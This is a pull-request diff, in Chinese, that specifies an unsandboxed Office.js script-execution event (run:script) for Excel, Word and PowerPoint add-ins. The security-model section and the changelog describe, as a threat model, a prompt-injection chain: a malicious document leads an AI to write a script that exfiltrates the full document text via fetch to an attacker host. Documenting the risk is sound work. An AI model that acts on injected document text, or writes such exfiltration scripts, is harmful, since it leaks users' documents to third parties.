### PR TITLE
feat(all): {excel,word,ppt}:run:script —— 通用 Office.js 脚本执行接口（封装层逃生舱）

### DIFF
--- a/docs/appendix/changelog.md
+++ b/docs/appendix/changelog.md
@@ -27,6 +27,26 @@
 
 **兼容性**：`/excel` 为 Draft（无稳定性承诺），退役 5xxx 属可接受的破坏性收敛；通用码描述扩容对 `/word`（Stable）/`/ppt` 向后兼容。跨仓跟进——office4ai e2e（`manual_tests/excel/test_excel_e2e.py`）按通用码 reassert（`*_NOT_FOUND` 以 `details.kind` 区分）；office-editor4ai（`packages/shared/src/error-codes.ts`）port 通用 3xxx 而非 5xxx。
 
+### `{excel,word,ppt}:run:script` —— 通用 Office.js 脚本执行接口（封装层逃生舱）
+
+裁决 [#18](https://github.com/A2C-SMCP/oasp-protocol/issues/18)：三命名空间各新增一个 `run:script` 事件——调用方下发 JS 源码，AddIn 注入宿主 `RequestContext` 后按 Office.js 语义执行，回传返回值 + 日志。定位是**封装层逃生舱**（typed 事件未覆盖某能力、或某 typed 事件有 Bug 阻塞时的止血路径 + 新能力孵化器），**不替代** typed 事件。
+
+| 变更类型 | 位置 | 说明 |
+|----------|------|------|
+| 新增（事件 ×3） | `events-{excel,word,ppt}.md` | `excel:run:script` / `word:run:script` / `ppt:run:script`，三端同构，📋 Draft |
+| 新增（共享数据结构） | `data-structures.md` | `RunScriptRequest`（`script`/`args?`/`timeoutMs?`）+ `ScriptResult`（`result`/`logs`/`durationMs`/`logsTruncated`）——**宿主无关执行信封**，三命名空间共享（对齐 `BaseRequest`/`BaseResponse`；含「有意跨命名空间相同」admonition） |
+| 新增（共享语义节） | `conventions.md` §脚本执行 | 执行语义（AsyncFunction / 注入 `context`·`args`·`console` / 补 `sync` / JSON 序列化）+ 大小限制（`result` ≤ 512KB、`logs` ≤ 100KB，**UTF-8 字节**）+ 超时 + 安全模型 + 非原子性 + 错误映射 |
+| 新增（超时档） | `conventions.md` §超时约定 | 新增「脚本执行」档：缺省 60000ms，`timeoutMs` 可覆盖，**无硬上限** |
+| 错误码 | —— | **零新增**：复用 `4001/4002/4003/4004`（参数）·`3016`（宿主禁动态代码，`phase:compile`）·`3004`（`fault:script`/`fault:office`）·`1002`（超时）·`3006`（`result` 过大） |
+
+**安全模型（规范正文，MUST 阅读）**：`run:script` 以 `AsyncFunction` 执行、**非沙箱**（沙箱与「直接调原生 Office.js」的目的在定义上互斥），全局对象敞开，信任边界 = Socket.IO 握手鉴权。如实记录**本事件独有的攻击面**（恶意文档提示词注入 → AI 生成含 `fetch` 的脚本 → 外泄，typed 事件不可达）。人在环「执行前确认」由**上层 Agent 层**的通用工具二次确认承担，OASP 为**纯能力提供方**，不自建确认门、不提供安全边界。
+
+**非原子性（规范正文）**：与 typed 事件不同，`run:script` **不保证原子性/回滚**——失败时文档可能处于任意中间状态（跨 sync 已落盘不可回滚 + 单 sync 内部半批执行）。Office.js 无事务 API；需对账的调用方应在脚本内自行 read-back。
+
+**待裁决收敛**（原 issue 6 项 → 3 项由架构判断消除）：确认门移至上层 Agent 层后，「用户拒绝执行」新码（原候选 `3019`）**取消**（拒绝发生在 Agent 层、请求不到线缆）、确认门握手能力位**取消**、「能力被关闭」码收敛为既有 `3016`（仅剩宿主真的跑不了这一种）。动作词取 `run`（对齐 Office.js `Excel.run`/`Word.run`）；错误码取「compile→`4002` / execute→`3004` 且 `details.fault` 区分」而非专用码（承 #17 收敛号段之势）；不引入 `dryRun`。
+
+**兼容性**：纯加法 MINOR。`/excel`·`/ppt` 为 Draft；`/word` 为 Stable 但本事件为**纯加法**（新增事件不改任何既有契约），符合 Stable 变更门槛。跨仓跟进——office4ai：每命名空间一个 MCP 工具（`{ns}_run_script`，ESCAPE HATCH 定位 + 优先 typed 的 description，与既有离线 `office_run_script` 互指）、`{ns}:run:script` 派生 `server_timeout=(timeoutMs??60s)+GRACE`；office-editor4ai：三端 `AsyncFunction` 执行器（宿主无关核心进 `shared`）、`client.ts` 双重 ack 修复、**发版前**补测 Windows/WebView2 + Office-on-web 探针。
+
 ## [0.4.0] - 2026-07-13
 
 ### /word 字体字段收敛为 WordFont + 修正 UnderlineStyle（含 Stable 破坏性变更）

--- a/docs/specification/conventions.md
+++ b/docs/specification/conventions.md
@@ -341,6 +341,7 @@ PPT 中的位置和尺寸使用 **磅 (point)** 为单位。
 | 复杂查询 | 30 秒 |
 | 修改操作 | 30 秒 |
 | 批量操作 | 60 秒 |
+| 脚本执行（`run:script`） | 60 秒（缺省，可经请求 `timeoutMs` 覆盖，**无硬上限**）——详见[§脚本执行](#run-script) |
 
 ### 超时处理
 
@@ -434,3 +435,74 @@ AddIn 连接时 **MUST** 在 `auth` 对象中声明 `oaspVersion`（与 `clientI
 
 - **非目标**（有意排除，保持机制最小）：capabilities 特性发现、自动协商降级、单 Server 实例多协议版本共存、peer-to-peer 协商。多版本并存靠部署拓扑解决——一个 Server 实例只讲一个协议版本。
 - **版本握手 ≠ 运行时能力**：协议版本握手回答「两端能不能说同一种 OASP」（连接期、一次性、强制）；运行时能力（如某 Office.js `PowerPointApi` requirement set 1.2 / 1.8 是否可用）回答「这台宿主此刻能不能做某动作」（操作期、按需）。二者**正交**——握手通过不代表某具体能力可用；能力不满足在操作期由 [`3016 API_NOT_SUPPORTED`](error-handling.md) **反应式**处理，不在握手期校验。
+
+## 脚本执行 {#run-script}
+
+本节定义 `{namespace}:run:script`（`excel:run:script` / `word:run:script` / `ppt:run:script`）的共享执行语义、大小限制、超时、安全模型、非原子性与错误映射。三命名空间**语义完全一致**，仅注入的宿主 `context` 不同。请求/结果结构见[数据结构 · 脚本执行](data-structures.md#script-execution)。
+
+### 定位
+
+`run:script` 是**封装层逃生舱（escape hatch）**，**不替代** typed 事件。它服务且仅服务两类场景：① Office.js 有能力但协议尚未封装；② 某 typed 事件有 Bug、修复前该能力归零。调用方**应优先使用 typed 事件**，仅在其覆盖不到或不可用时使用本事件；高频脚本应沉淀为新的 typed 事件——`run:script` 兼作新能力的孵化器。
+
+### 执行语义（规范层）
+
+- 脚本以 **async 函数体**语义执行（等价于 `new AsyncFunction(...)`，**非** `eval`），可用 `await`、可用 `return` 返回结果。
+- 注入三个名字：`context`（对应命名空间的宿主 `RequestContext`——Excel `Excel.RequestContext` / Word `Word.RequestContext` / PPT `PowerPoint.RequestContext`）、`args`（请求的 `args`，缺省 `{}`）、`console`（捕获式，输出按序进 `ScriptResult.logs`）。宿主全局 `Excel` / `Word` / `PowerPoint` / `Office` / `OfficeRuntime` / `OfficeExtension` 本就在全局作用域，**不额外注入**。
+- 脚本成功结束后，AddIn **MUST** 补一次 `context.sync()`，使「只写不读、未显式 sync」的脚本也落盘。
+- `result` 经 `JSON.stringify` + replacer 序列化为纯 JSON：先调 `toJSON()` 再调 replacer，故 Office.js `ClientObject`（Range / Table / Chart …）可直接 `return`，得到其已 `load` 的属性快照；循环引用降级为 `"[Circular]"`，函数字段剔除；无 `return` 时 `result` 为 `null`。
+
+### 大小限制（规范层，线缆字节）
+
+以 **UTF-8 字节**计（**非字符**——CJK 下字节可达字符数三倍，且 socket.io 接收缓冲以字节计）：
+
+- `result` 序列化后 **> 512 KB** → 整请求失败，返回 [`3006 CONTENT_TOO_LARGE`](error-handling.md)（`details.phase:"serialize"`）。大范围数据应改用 typed 事件（如 `excel:get:range`）或在脚本内聚合，不经逃生舱搬运。
+- `logs` 总量 **> 100 KB** → 截断并置 `logsTruncated: true`（**不**使请求失败）。单行长度等细分阈值为实现细节。
+
+### 超时（规范层）
+
+- 「脚本执行」档缺省 **60000 ms**，可经请求 `timeoutMs` 覆盖，**无硬上限**（脚本时长只有调用方知道）。
+- 超时返回 [`1002 TIMEOUT`](error-handling.md)（`details.phase:"execute"`，带截断前 `logs`）。
+- **非抢占局限**：超时后 AddIn **应尽力中止**（如在后续 `await context.sync()` 处拒绝），但**同步 JS 不可抢占**——脚本内的同步长循环会独占宿主线程直至自行结束，超时计时器亦无法插入。调用方**不得**假设超时即刻停机，须结合下节[非原子性](#run-script-atomicity)理解可能的残留副作用。
+
+### 安全模型（规范层，MUST 阅读）
+
+!!! danger "这不是沙箱，且沙箱与本事件的目的在定义上互斥"
+    `run:script` 以 `AsyncFunction` 执行仅隔掉宿主的**局部词法作用域**，**全局对象完全敞开**——脚本可触达 `window` / `fetch` / `localStorage` / Socket.IO client 本身。叠加 manifest 的 `ReadWriteDocument`：**谁能下发脚本，谁就完全控制用户文档与该 taskpane 的浏览器上下文。**
+
+- **沙箱化会摧毁本事件的价值**：Office.js 对象是绑定在 AddIn 页面 realm 上的代理对象，无法穿越 iframe / Worker 隔离边界；给脚本套可序列化 RPC 门面即等于重新发明 Office Scripts 的受限 API，而「直接调原生 Office.js」正是本事件的全部价值。故本协议**有意不引入**任何脚本沙箱。
+- **信任边界 = 握手鉴权**：安全性 100% 依赖脚本来源可信度，即 Socket.IO 连接握手的鉴权（见[连接与握手](connection.md)）。这是防线的全部，不存在其他「防护」。
+- **本事件独有的攻击面**：typed 事件只能把文档内容发回已认证的自有 Server；脚本能触达 `fetch`，可发往**任意第三方**。而 Office 文档本身是攻击者可控输入，故存在「恶意文档提示词注入 → AI 读文档 → AI 生成含 `fetch('attacker', { body: 全文 })` 的脚本 → 执行外泄」这条 **typed 事件不可达**的链路。规范如实记录此链，不淡化。
+- **人在环确认不在 OASP**：对「执行前是否要终端用户确认」的把关由**上层 Agent 层**承担——Agent 宿主对**任意** MCP 工具调用统一提供二次确认（如 permission prompt）。OASP / AddIn 为**纯能力提供方**，`run:script` 与其余 typed 事件一样静默放行、**不自建确认门、不提供安全边界**。若 Agent 宿主被配置为自动批准，该确认随之失效——这是宿主配置域的责任，OASP 不兜底。
+
+### 非原子性（规范层）{#run-script-atomicity}
+
+!!! warning "run:script 不提供任何原子性 / 回滚保证"
+    与 typed 事件不同，`run:script` 失败时**文档可能处于任意中间状态**。非原子性有两层，Office.js 均无事务 / 回滚 API 可消除：
+
+    1. **跨 sync 非原子**：脚本「写 A → `await sync()` → 写 B → throw」时，A 已往返落盘、不可回滚；B 尚在本地命令队列、随失败丢弃。即 **throw 前每次成功 sync 的写入全部残留**。
+    2. **单次 sync 内部非原子**：一次 `sync()` 把命令队列整批发往宿主，宿主按序执行、在首条失败命令处停止、**之前的命令不回滚**。故哪怕只有一次 sync 也可能残留半批写入。
+
+    需要对账的调用方**应在脚本内自行 read-back** 校验最终状态。
+
+### 错误映射（规范层）{#run-script-errors}
+
+`details` 是本事件的核心——脚本多由 LLM 生成，靠回包自我修正。全部复用[共享错误码注册表](error-handling.md)，**零新增码**：
+
+| 触发条件（线缆可观测） | 错误码 | `details` |
+|---|---|---|
+| 缺 `script` | `4001 MISSING_PARAM` | — |
+| `timeoutMs` 越界（如负数） | `4004 PARAM_OUT_OF_RANGE` | — |
+| `args` 不可 JSON 序列化 | `4003 INVALID_PARAM_TYPE` | — |
+| 脚本**语法错**（编译期拦下，未触碰文档） | `4002 INVALID_PARAM` | `phase:"compile"`, `name`, `stack` |
+| 宿主**不支持动态代码构造**（CSP 拦截 `AsyncFunction`，编译期，未触碰文档） | `3016 API_NOT_SUPPORTED` | `phase:"compile"` |
+| 脚本**自身抛错**（TypeError / ReferenceError / 主动 throw） | `3004 OPERATION_FAILED` | `phase:"execute"`, `fault:"script"`, `name`, `stack`, `logs` |
+| 脚本调用 **Office.js 失败** | `3004 OPERATION_FAILED` | `phase:"execute"`, `fault:"office"`, `officeCode`, `debugInfo?`, `stack`, `logs` |
+| 执行**超时** | `1002 TIMEOUT` | `phase:"execute"`, `logs` |
+| `result` **过大**（见大小限制） | `3006 CONTENT_TOO_LARGE` | `phase:"serialize"` |
+
+- `phase` ∈ `"compile" | "execute" | "serialize"`，标识失败阶段。
+- `fault` ∈ `"script" | "office"`（仅 `execute` 阶段），区分「脚本自身缺陷」与「文档操作被宿主拒绝」——AI 据此决定**重写脚本** vs **调整操作**。判据为 `error instanceof OfficeExtension.Error`。
+- `officeCode` = `OfficeExtension.Error.code`（如 `InvalidArgument` / `ItemNotFound`）。`debugInfo` 为 `OfficeExtension.DebugInfo` 的**不透明透传**，其 `errorLocation` 等字段**可缺省**（`GeneralException` 常无），消费方**不得**假设其存在。
+
+!!! note "compile 期语义安全"
+    语法错与 CSP 拦截均在 `AsyncFunction` 构造期发生，**先于**任何 `*.run` 调用——`RequestContext` 尚未创建、文档零接触，故这两类失败**保证无副作用**。

--- a/docs/specification/data-structures.md
+++ b/docs/specification/data-structures.md
@@ -656,3 +656,38 @@ type InsertLocation =
   | "End"                  // 在目标末尾
   | "Replace";             // 替换目标
 ```
+
+---
+
+## 脚本执行 {#script-execution}
+
+`{namespace}:run:script`（`excel:run:script` / `word:run:script` / `ppt:run:script`）是**封装层逃生舱**：调用方下发一段 JS 源码，AddIn 注入宿主 `RequestContext` 后按 Office.js 语义直接执行，回传返回值与日志。定位、执行语义、超时、大小限制、安全模型、非原子性与错误映射统一见[通用约定 · 脚本执行](conventions.md#run-script)。三命名空间的请求与结果结构**完全相同**，故在此共享。
+
+!!! note "有意的跨命名空间「相同」（非命名不一致）"
+    `RunScriptRequest` / `ScriptResult` 是**宿主无关的执行信封**——承载「一段代码 + 其产出」，宿主差异（`Excel` / `Word` / `PowerPoint` 各自的对象模型）全部落在脚本内部的 `context` 上、不进入信封。故它与 `BaseRequest` / `BaseResponse` 同属**传输层**，三命名空间**应当共享同一结构**；这与 [`WordFont`](#wordfont) ≠ `PptFont`（宿主语义层实体、有意零映射对齐各自宿主）方向相反、各自适用。后人**不应**将其拆成三份 per-namespace 结构。
+
+### RunScriptRequest
+
+```typescript
+interface RunScriptRequest {
+  requestId: string;
+  documentUri: string;
+  timestamp?: number;
+  script: string;                    // 待执行 JS 源码；以 async 函数体语义执行，可用 return 返回结果
+  args?: Record<string, unknown>;    // 注入脚本的参数，脚本内经全局 `args` 读取；必须可 JSON 序列化
+  timeoutMs?: number;                // 执行超时（毫秒）；缺省取「脚本执行」档默认值（60000），无硬上限
+}
+```
+
+### ScriptResult
+
+`run:script` 成功响应的 `data`。
+
+```typescript
+interface ScriptResult {
+  result: unknown;          // 脚本 return 的值，已序列化为纯 JSON；无返回值时为 null
+  logs: string[];           // 脚本内 console.* 的输出，按调用顺序
+  durationMs: number;       // 脚本执行耗时（毫秒）
+  logsTruncated: boolean;   // 日志是否因超限（见 conventions#run-script）被截断
+}
+```

--- a/docs/specification/error-handling.md
+++ b/docs/specification/error-handling.md
@@ -203,6 +203,12 @@ interface ErrorResponse {
 - 检查用户是否有编辑权限，或目标工作表是否受保护
 - 提示用户保存文档副本，或解除工作表保护后重试
 
+### OPERATION_FAILED (3004)
+
+**触发场景**: 操作在执行阶段失败。
+
+**`run:script` 的二级分流**: 承载 `{namespace}:run:script`（[通用约定 · 脚本执行](conventions.md#run-script)）的执行期失败时，`details.fault` 区分失败来源——`"script"`（脚本自身抛错：TypeError / ReferenceError / 主动 throw，附 `name` / `stack`）或 `"office"`（脚本调用 Office.js 失败，附 `officeCode` / `debugInfo?`）。AI 据此决定**重写脚本** vs **调整操作**。脚本各阶段（compile / execute / serialize）→ 错误码的完整映射见[通用约定 · 脚本执行 · 错误映射](conventions.md#run-script-errors)。
+
 ### API_NOT_SUPPORTED (3016)
 
 **触发场景**: 目标操作所依赖的能力在当前客户端或平台上不可用——例如所需的 requirement set 未满足（如 PowerPointApi、ExcelApi），或宿主环境（如移动端、Web 端、老版本永久授权 Office）不提供该能力（如部分平台不支持透视表 `excel:insert:pivotTable`）。

--- a/docs/specification/events-excel.md
+++ b/docs/specification/events-excel.md
@@ -7,7 +7,7 @@
 
 本章定义 `/excel` 命名空间下的所有事件。Excel 事件用于操作 Microsoft Excel 工作簿。
 
-共 **37 个事件**，覆盖状态感知、Range 操作、格式样式、合并单元格、工作表管理、表格操作、图表操作、透视表操作、查找筛选和公式设置。
+共 **38 个事件**，覆盖状态感知、Range 操作、格式样式、合并单元格、工作表管理、表格操作、图表操作、透视表操作、查找筛选、公式设置和脚本执行。
 
 ## 事件列表
 
@@ -97,6 +97,12 @@
 | 事件名 | 状态 | 说明 |
 |--------|------|------|
 | [excel:set:formula](#excelsetformula) | 📋 Draft | 设置单元格公式 |
+
+### 脚本执行类（Server → AddIn，请求-响应）
+
+| 事件名 | 状态 | 说明 |
+|--------|------|------|
+| [excel:run:script](#excelrunscript) | 📋 Draft | 执行原始 Office.js 脚本（封装层逃生舱） |
 
 ---
 
@@ -2827,3 +2833,93 @@ interface SetFormulaResponse {
 | 3009 | `RANGE_INVALID` - 无效的单元格地址 |
 | 3003 | `DOCUMENT_READ_ONLY` - 工作表受保护（`details.scope:"worksheet"`） |
 | 3017 | `FORMULA_ERROR` - 公式语法错误或引用无效 |
+
+---
+
+## 脚本执行类
+
+### excel:run:script
+
+**方向**: Server → AddIn（请求-响应）
+
+**状态**: 📋 Draft
+
+**说明**: **封装层逃生舱**——对实时工作簿执行一段原始 Office.js 脚本。**应优先使用 typed `excel:*` 事件**，仅在其未覆盖某能力、或某 typed 事件有 Bug 阻塞时使用。共享执行语义、大小限制、超时、安全模型、非原子性与错误映射见[通用约定 · 脚本执行](conventions.md#run-script)。
+
+**请求数据**（共享 [`RunScriptRequest`](data-structures.md#script-execution)）:
+
+```typescript
+interface RunScriptRequest {
+  requestId: string;
+  documentUri: string;
+  timestamp?: number;
+  script: string;                    // async 函数体；注入 context(Excel.RequestContext)/args/console，可 return
+  args?: Record<string, unknown>;    // 注入脚本，脚本内经 `args` 读取；必须可 JSON 序列化
+  timeoutMs?: number;                // 执行超时（毫秒），缺省「脚本执行」档 60000，无硬上限
+}
+```
+
+**字段说明**:
+
+| 字段 | 类型 | 必需 | 说明 |
+|------|------|------|------|
+| `script` | string | ✅ | 待执行 JS 源码，async 函数体语义 |
+| `args` | Record<string, unknown> | ❌ | 注入脚本的参数，脚本内经 `args` 读取；必须可 JSON 序列化 |
+| `timeoutMs` | number | ❌ | 执行超时（毫秒），缺省 60000，无硬上限 |
+
+**请求示例**:
+
+```json
+{
+  "requestId": "a1b2c3d4-e5f6-4a5b-8c7d-9e0f1a2b3c4d",
+  "documentUri": "file:///Users/john/Documents/data.xlsx",
+  "script": "const sheet = context.workbook.worksheets.getActiveWorksheet();\nconst range = sheet.getRange(args.address);\nrange.load('values');\nawait context.sync();\nreturn range.values;",
+  "args": { "address": "A1:B2" }
+}
+```
+
+**响应数据**（`data` 为共享 [`ScriptResult`](data-structures.md#script-execution)）:
+
+```typescript
+interface RunScriptResponse {
+  requestId: string;
+  success: boolean;
+  data?: ScriptResult;        // { result, logs, durationMs, logsTruncated }
+  error?: ErrorResponse;
+  timestamp: number;
+  duration?: number;
+}
+```
+
+**响应示例**:
+
+```json
+{
+  "requestId": "a1b2c3d4-e5f6-4a5b-8c7d-9e0f1a2b3c4d",
+  "success": true,
+  "data": {
+    "result": [["姓名", "年龄"], ["张三", 25]],
+    "logs": [],
+    "durationMs": 42,
+    "logsTruncated": false
+  },
+  "timestamp": 1704067200500,
+  "duration": 45
+}
+```
+
+!!! danger "安全模型与非原子性"
+    `run:script` 以敞开全局对象的原生 JS 执行、**非沙箱**，信任边界即 Socket.IO 握手鉴权；失败时文档可能残留**部分修改**（无原子性 / 回滚）。执行前的人在环确认由**上层 Agent 层**承担，OASP 为纯能力提供方。完整规范见[通用约定 · 脚本执行](conventions.md#run-script)。
+
+**可能的错误**（完整映射见[通用约定 · 脚本执行 · 错误映射](conventions.md#run-script-errors)）:
+
+| 错误码 | 说明 |
+|--------|------|
+| 4001 | `MISSING_PARAM` - 缺少 `script` |
+| 4003 | `INVALID_PARAM_TYPE` - `args` 不可 JSON 序列化 |
+| 4004 | `PARAM_OUT_OF_RANGE` - `timeoutMs` 越界 |
+| 4002 | `INVALID_PARAM` - 脚本语法错（`phase:"compile"`） |
+| 3016 | `API_NOT_SUPPORTED` - 宿主不支持动态代码构造（`phase:"compile"`） |
+| 3004 | `OPERATION_FAILED` - 脚本自身抛错（`fault:"script"`）或 Office.js 调用失败（`fault:"office"`） |
+| 1002 | `TIMEOUT` - 执行超时 |
+| 3006 | `CONTENT_TOO_LARGE` - result 过大（`phase:"serialize"`） |

--- a/docs/specification/events-ppt.md
+++ b/docs/specification/events-ppt.md
@@ -69,6 +69,12 @@
 !!! info "关于 ppt:insert:video"
     PowerPoint JavaScript API **不支持**插入视频/音频元素。此功能标记为 🚫 Not Feasible，不在事件列表中定义。
 
+### 脚本执行类（Server → AddIn，请求-响应）
+
+| 事件名 | 状态 | 说明 |
+|--------|------|------|
+| [ppt:run:script](#pptrunscript) | 📋 Draft | 执行原始 Office.js 脚本（封装层逃生舱） |
+
 ---
 
 ## 事件报告类
@@ -2995,3 +3001,95 @@ interface InsertSlidesOoxmlResponse {
 | 3003 | `DOCUMENT_READ_ONLY` - 目标文档不可写入（只读或被锁定，无法应用修改） |
 | 3004 | `OPERATION_FAILED` - 插入/替换/复位失败 |
 | 3016 | `API_NOT_SUPPORTED` - 所需能力（插入需 PowerPointApi 1.2、finalSlideIndex 复位需 1.8）在当前客户端/平台不满足；调用方应降级到另一实现路径 |
+
+---
+
+## 脚本执行类
+
+### ppt:run:script
+
+**方向**: Server → AddIn（请求-响应）
+
+**状态**: 📋 Draft
+
+**说明**: **封装层逃生舱**——对实时演示文稿执行一段原始 Office.js 脚本。**应优先使用 typed `ppt:*` 事件**，仅在其未覆盖某能力、或某 typed 事件有 Bug 阻塞时使用。共享执行语义、大小限制、超时、安全模型、非原子性与错误映射见[通用约定 · 脚本执行](conventions.md#run-script)。
+
+**请求数据**（共享 [`RunScriptRequest`](data-structures.md#script-execution)）:
+
+```typescript
+interface RunScriptRequest {
+  requestId: string;
+  documentUri: string;
+  timestamp?: number;
+  script: string;                    // async 函数体；注入 context(PowerPoint.RequestContext)/args/console，可 return
+  args?: Record<string, unknown>;    // 注入脚本，脚本内经 `args` 读取；必须可 JSON 序列化
+  timeoutMs?: number;                // 执行超时（毫秒），缺省「脚本执行」档 60000，无硬上限
+}
+```
+
+**字段说明**:
+
+| 字段 | 类型 | 必需 | 说明 |
+|------|------|------|------|
+| `script` | string | ✅ | 待执行 JS 源码，async 函数体语义 |
+| `args` | Record<string, unknown> | ❌ | 注入脚本的参数，脚本内经 `args` 读取；必须可 JSON 序列化 |
+| `timeoutMs` | number | ❌ | 执行超时（毫秒），缺省 60000，无硬上限 |
+
+**请求示例**:
+
+```json
+{
+  "requestId": "a1b2c3d4-e5f6-4a5b-8c7d-9e0f1a2b3c4d",
+  "documentUri": "file:///Users/john/Documents/deck.pptx",
+  "script": "const slides = context.presentation.slides;\nslides.load('items');\nawait context.sync();\nreturn slides.items.length;"
+}
+```
+
+**响应数据**（`data` 为共享 [`ScriptResult`](data-structures.md#script-execution)）:
+
+```typescript
+interface RunScriptResponse {
+  requestId: string;
+  success: boolean;
+  data?: ScriptResult;        // { result, logs, durationMs, logsTruncated }
+  error?: ErrorResponse;
+  timestamp: number;
+  duration?: number;
+}
+```
+
+**响应示例**:
+
+```json
+{
+  "requestId": "a1b2c3d4-e5f6-4a5b-8c7d-9e0f1a2b3c4d",
+  "success": true,
+  "data": {
+    "result": 12,
+    "logs": [],
+    "durationMs": 38,
+    "logsTruncated": false
+  },
+  "timestamp": 1704067200500,
+  "duration": 40
+}
+```
+
+!!! info "PPT 宿主能力自检（实现提示 / 非规范）"
+    `PowerPointApi` requirement set 起步较晚，脚本调用当前宿主**不存在**的 API 时，代理对象上的方法为 `undefined` → 抛 `TypeError`，会被错误映射记为 `fault:"script"`（而真因是宿主能力不足）。脚本**建议**先用全局 `Office.context.requirements.isSetSupported("PowerPointApi", "1.x")` 自检目标能力再调用，以获得更准确的失败归因。
+
+!!! danger "安全模型与非原子性"
+    `run:script` 以敞开全局对象的原生 JS 执行、**非沙箱**，信任边界即 Socket.IO 握手鉴权；失败时文档可能残留**部分修改**（无原子性 / 回滚）。执行前的人在环确认由**上层 Agent 层**承担，OASP 为纯能力提供方。完整规范见[通用约定 · 脚本执行](conventions.md#run-script)。
+
+**可能的错误**（完整映射见[通用约定 · 脚本执行 · 错误映射](conventions.md#run-script-errors)）:
+
+| 错误码 | 说明 |
+|--------|------|
+| 4001 | `MISSING_PARAM` - 缺少 `script` |
+| 4003 | `INVALID_PARAM_TYPE` - `args` 不可 JSON 序列化 |
+| 4004 | `PARAM_OUT_OF_RANGE` - `timeoutMs` 越界 |
+| 4002 | `INVALID_PARAM` - 脚本语法错（`phase:"compile"`） |
+| 3016 | `API_NOT_SUPPORTED` - 宿主不支持动态代码构造（`phase:"compile"`） |
+| 3004 | `OPERATION_FAILED` - 脚本自身抛错（`fault:"script"`）或 Office.js 调用失败（`fault:"office"`） |
+| 1002 | `TIMEOUT` - 执行超时 |
+| 3006 | `CONTENT_TOO_LARGE` - result 过大（`phase:"serialize"`） |

--- a/docs/specification/events-word.md
+++ b/docs/specification/events-word.md
@@ -68,6 +68,12 @@
 | [word:reply:comment](#wordreplycomment) | ✅ Stable | 回复已有批注 |
 | [word:resolve:comment](#wordresolvecomment) | ✅ Stable | 解决/取消解决批注 |
 
+### 脚本执行类（Server → AddIn，请求-响应）
+
+| 事件名 | 状态 | 说明 |
+|--------|------|------|
+| [word:run:script](#wordrunscript) | 📋 Draft | 执行原始 Office.js 脚本（封装层逃生舱） |
+
 ---
 
 ## 事件报告类
@@ -2630,3 +2636,95 @@ interface ResolveCommentResponse {
 |--------|------|
 | 4000 | `VALIDATION_ERROR` - 请求参数校验失败（commentId 为空） |
 | 3000 | `OFFICE_API_ERROR` - Office API 调用错误（批注不存在等） |
+
+---
+
+## 脚本执行类
+
+### word:run:script
+
+**方向**: Server → AddIn（请求-响应）
+
+**状态**: 📋 Draft
+
+!!! note "新增事件（纯加法）"
+    `/word` 命名空间为 ✅ Stable，但本事件为**纯加法**——新增事件**不修改**任何既有事件 / 字段 / 错误码的语义与契约，不影响 `/word` 既有 Stable 事件的兼容性承诺。事件本身以 📋 Draft 进入（接口可能在正式发布前微调）。
+
+**说明**: **封装层逃生舱**——对实时文档执行一段原始 Office.js 脚本。**应优先使用 typed `word:*` 事件**，仅在其未覆盖某能力、或某 typed 事件有 Bug 阻塞时使用。共享执行语义、大小限制、超时、安全模型、非原子性与错误映射见[通用约定 · 脚本执行](conventions.md#run-script)。
+
+**请求数据**（共享 [`RunScriptRequest`](data-structures.md#script-execution)）:
+
+```typescript
+interface RunScriptRequest {
+  requestId: string;
+  documentUri: string;
+  timestamp?: number;
+  script: string;                    // async 函数体；注入 context(Word.RequestContext)/args/console，可 return
+  args?: Record<string, unknown>;    // 注入脚本，脚本内经 `args` 读取；必须可 JSON 序列化
+  timeoutMs?: number;                // 执行超时（毫秒），缺省「脚本执行」档 60000，无硬上限
+}
+```
+
+**字段说明**:
+
+| 字段 | 类型 | 必需 | 说明 |
+|------|------|------|------|
+| `script` | string | ✅ | 待执行 JS 源码，async 函数体语义 |
+| `args` | Record<string, unknown> | ❌ | 注入脚本的参数，脚本内经 `args` 读取；必须可 JSON 序列化 |
+| `timeoutMs` | number | ❌ | 执行超时（毫秒），缺省 60000，无硬上限 |
+
+**请求示例**:
+
+```json
+{
+  "requestId": "a1b2c3d4-e5f6-4a5b-8c7d-9e0f1a2b3c4d",
+  "documentUri": "file:///Users/john/Documents/report.docx",
+  "script": "const paras = context.document.body.paragraphs;\nparas.load('text');\nawait context.sync();\nreturn paras.items.map(p => p.text);"
+}
+```
+
+**响应数据**（`data` 为共享 [`ScriptResult`](data-structures.md#script-execution)）:
+
+```typescript
+interface RunScriptResponse {
+  requestId: string;
+  success: boolean;
+  data?: ScriptResult;        // { result, logs, durationMs, logsTruncated }
+  error?: ErrorResponse;
+  timestamp: number;
+  duration?: number;
+}
+```
+
+**响应示例**:
+
+```json
+{
+  "requestId": "a1b2c3d4-e5f6-4a5b-8c7d-9e0f1a2b3c4d",
+  "success": true,
+  "data": {
+    "result": ["标题", "第一段正文。"],
+    "logs": [],
+    "durationMs": 51,
+    "logsTruncated": false
+  },
+  "timestamp": 1704067200500,
+  "duration": 54
+}
+```
+
+!!! danger "安全模型与非原子性"
+    `run:script` 以敞开全局对象的原生 JS 执行、**非沙箱**，信任边界即 Socket.IO 握手鉴权；失败时文档可能残留**部分修改**（无原子性 / 回滚）。执行前的人在环确认由**上层 Agent 层**承担，OASP 为纯能力提供方。完整规范见[通用约定 · 脚本执行](conventions.md#run-script)。
+
+**可能的错误**（完整映射见[通用约定 · 脚本执行 · 错误映射](conventions.md#run-script-errors)）:
+
+| 错误码 | 说明 |
+|--------|------|
+| 4001 | `MISSING_PARAM` - 缺少 `script` |
+| 4003 | `INVALID_PARAM_TYPE` - `args` 不可 JSON 序列化 |
+| 4004 | `PARAM_OUT_OF_RANGE` - `timeoutMs` 越界 |
+| 4002 | `INVALID_PARAM` - 脚本语法错（`phase:"compile"`） |
+| 3016 | `API_NOT_SUPPORTED` - 宿主不支持动态代码构造（`phase:"compile"`） |
+| 3004 | `OPERATION_FAILED` - 脚本自身抛错（`fault:"script"`）或 Office.js 调用失败（`fault:"office"`） |
+| 1002 | `TIMEOUT` - 执行超时 |
+| 3006 | `CONTENT_TOO_LARGE` - result 过大（`phase:"serialize"`） |


### PR DESCRIPTION
Closes #18。

三命名空间各新增一个 `run:script` 事件——调用方下发 JS 源码，Add-In 注入宿主 `RequestContext` 后按 Office.js 语义执行，回传返回值 + 日志。定位是**封装层逃生舱**（typed 事件未覆盖某能力、或某 typed 事件有 Bug 阻塞时的止血路径 + 新能力孵化器），**不替代**既有 82 个 typed 事件。**零新增错误码，纯加法 MINOR → 0.5.0。**

## 变更

| 文件 | 变更 |
|------|------|
